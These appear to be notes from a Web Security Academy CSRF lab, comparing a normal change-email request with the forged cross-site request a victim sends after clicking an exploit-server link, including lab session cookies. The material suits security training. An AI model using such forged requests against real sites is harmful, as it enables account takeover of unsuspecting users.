REQUEST NORMAL :
POST /my-account/change-email HTTP/2
Host: 0a8100d104f324c982ec70c4002500a5.web-security-academy.net
Cookie: session=Upn6chdSyxSaRVHPifDcrCKk7FLPAIpv
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: https://0a8100d104f324c982ec70c4002500a5.web-security-academy.net
Referer: https://0a8100d104f324c982ec70c4002500a5.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
email=P4IM0N%40hotmail.com
REQUEST DEL USUARIO VICTIMA DEL PAYLOAD AL HACER CLICK AL LINK:
POST /my-account/change-email HTTP/2
Host: 0a8100d104f324c982ec70c4002500a5.web-security-academy.net
Cookie: session=EldoSHDpwT1T8gDu60u9vgof5sWDY09k; session=CFenbsEnUZ29kezAApYAYde97k2jkRTx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: https://exploit-0a1900d004f6242982e16f4301c20011.exploit-server.net
Referer: https://exploit-0a1900d004f6242982e16f4301c20011.exploit-server.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Te: trailers
email=malisiosoP4IM0Nmalisioso%40hotmail.com